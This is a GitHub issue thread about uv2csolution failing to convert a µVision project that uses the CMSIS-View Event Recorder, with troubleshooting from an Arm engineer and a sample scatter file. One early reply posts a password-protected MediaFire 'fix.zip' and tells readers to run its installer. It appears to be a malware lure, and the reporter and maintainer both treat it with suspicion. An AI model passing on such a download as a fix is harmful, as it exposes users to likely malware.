ARM-software/vscode-cmsis-csolution #73: uv2csolution failure because of ARM::CMSIS-View:Event Recorder

MickroC, 2024-08-26:
Type: Bug Report

**Describe the bug**
- OS and Version: Win10 Pro
- VS Code Version: 1.92.2
- Extension Version: 
  - Arm CMSIS Solution: 1.18.3
  - Arm Keil Studio Pack (MDK v6): 1.18.3
- Target Device: STM32F411RETx

**Bug description**
I have a minimalistic µVision project (Version 5.34.0.0) for the given target device. The project contains the *CMSIS-View* component to use the *Event Recorder* (1.6.0). As described [here](https://arm-software.github.io/CMSIS-View/main/er_use.html#evr_create_mem_uv), I have manually added a "No Init" region assigned to the Event Recorder.

The project is valid and it can be compiled by µVision.

Now I'd like to switch to VS-Code, using the extensions *Arm CMSIS Solution* and *Arm Keil Studio Pack (MDK v6)*. I have tried to convert the existing µVision project using the uv2csolution tool, which results in the following error:

> Errors:
> 	The scatter file "Target 1" is configured with following components which contain files to be added manually to 
> 	ARM::CMSIS-View:Event Recorder (It may have additional missing files)

If I remove the Event Recorder from my µVision project, the conversion works without any problems and the project can be compiled by VS-Code.

**To Reproduce**
Steps to reproduce the behavior:
1. Create a minimalistic µVision project
2. Add the *Event Recorder* and *CMSIS-View* software components
3. Configure the *Event Recorder* as described [here](https://arm-software.github.io/CMSIS-View/main/er_use.html#evr_create_mem_uv)
4. Try to convert the µVision project using the VS-Code extension *Arm CMSIS Solution*

**Expected behavior**
The conversion should result in an error similar to the previously described one

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MickroC, 2024-08-26:
Ok, fastest response ever! Thank you!

Unfortunately I have some restrictions from our IT about downloading zip-files and running some arbitrary installer exe-files...
Can you give me some backround info about it? Is this a nown issue (I've searched for it, but couldn't find anything) and how does your succested solution work?

jkrech, 2024-08-26:
@swaggy111 I have never seen you posting here. Can you please identify yourself? My name is Joachim Krech and I am working for Arm. I am not aware of any installer fixing the above problem.

My suggestion is that you use the linker script being generated by uVision and specify this as selected linker script instead of having it generated.

In the "Options for Target" dialog's tab "Linker" remove the checkbox at the top "Use Memory Layout from Target Dialog"
In the line "Scatter File" probably the correct "previously generated" linker script will show. Otherwise click the `...` and browse to the scatter file. 
Save the uvprojx file using "Save all ..." and convert the project again.
Please let me know whether this solves your problem.

MickroC, 2024-08-26:
@jkrech Thank you for your quick response. I've tried your suggestion without success. What I did:

1. I've copied the automatically created scatter file and named it "My_Scatter.sct"
2. I added "My_Scatter.sct" using the "Options for Target" dialog, as you described
3. Saved all
4. Tried to convert the project

Result:

> Errors:
> 	The scatter file "Target 1" is configured with following components which contain files to be added manually to 
> 	ARM::CMSIS-View:Event Recorder (It may have additional missing files)

As you can see, the error is still about a "Target 1" scatter file.

I've tried to clean up the whole project directory, removing all automatically/temporary generated files (e.g. the uvoptx-file) without success.

Last thing I've tried is to rename the project target to "Test 1", which results in the following conversion output:

> Errors:
> 	The scatter file "Test 1" is configured with following components which contain files to be added manually to 
> 	ARM::CMSIS-View:Event Recorder (It may have additional missing files)

"My_scatter.sct" is still selected, but it seems like it is ignored by uv2csolution.

Content of "My_scatter.sct":

```
; *************************************************************
; *** Scatter-Loading Description File generated by uVision ***
; *************************************************************

LR_IROM1 0x08000000 0x00080000  {    ; load region size_region
  ER_IROM1 0x08000000 0x00080000  {  ; load address = execution address
   *.o (RESET, +First)
   *(InRoot$$Sections)
   .ANY (+RO)
   .ANY (+XO)
  }
  RW_IRAM1 0x20000000 0x0001BF00  {  ; RW data
   .ANY (+RW +ZI)
  }
  RW_RAM1 0x2001BF00 UNINIT 0x00004100  {
    EventRecorder.o (+ZI)
  }
}
```

jkrech, 2024-08-26:
My bad. You also need to revert step 3 from this description back to <default>:
https://arm-software.github.io/CMSIS-View/main/er_use.html#evr_create_mem_uv
and "save all" again before converting again.
Otherwise the assignment "Zero Initialized Dta: for all modules of the EventRecorder component is still stored in the uvprojx.